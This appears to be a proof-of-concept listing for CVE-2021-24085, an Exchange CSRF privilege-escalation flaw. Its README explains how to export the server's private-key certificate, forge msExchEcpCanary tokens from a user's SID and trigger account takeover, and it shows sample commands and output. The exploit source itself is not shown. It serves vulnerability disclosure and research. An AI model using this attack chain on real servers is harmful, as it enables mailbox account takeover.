
CVE-2021-24085 PoC — Microsoft Exchange Server Security Vulnerability

Associated Vulnerability
Title: Microsoft Exchange Server Security Vulnerability (CVE-2021-24085)
Description: Microsoft Exchange Server is an e-mail server product from the US company Microsoft. It provides mail access, storage and forwarding, voice mail, mail filtering and related functions. A security vulnerability exists in Microsoft Exchange Server. The following products and versions are affected: Microsoft Exchange Server 2019 Cumulative Update 8, Microsoft Exchange Server 2016 Cumulative Update 19, Microsoft Exchange
Readme
# Microsoft Exchange Server msExchEcpCanary Cross Site Request Forgery Elevation of Privilege Vulnerability

This is a Proof of Concept for CVE-2021-24085.

1. `poc.py` downloads the target's cert file with the private key inside
2. `YellowCanary` generates the `msExchEcpCanary` csrf token for a specific user based on the SID
3. `poc.js` is the csrf exploit to trigger an account takeover

I have not provided the `malicifest.xml` file, but you can find information on how to generate a malicious manifest file from the available resources in the References section below.

## Example

Access the certificate with private key inside:

```
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 harryh@exchangedemo.com:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 harryh@exchangedemo.com:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
```

Now you can generate csrf tokens with `YellowCanary` using a target user's SID:

```
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.
```
## References:

- https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
- https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
File Snapshot

```
[4.0K] /data/pocs/0b39ef8c891a45bcfe726d83df673c36bb276cb5
├── [1.5K] LICENSE
├── [1.6K] poc.js
├── [4.9K] poc.py
├── [1.7K] README.md
└── [4.0K] YellowCanary
    ├── [4.0K] Poc
    │   ├── [ 189] App.config
    │   ├── [2.3K] Poc.csproj
    │   ├── [9.5K] Program.cs
    │   └── [4.0K] Properties
    │       └── [1.4K] AssemblyInfo.cs
    └── [1.1K] YellowCanary.sln

3 directories, 9 files
```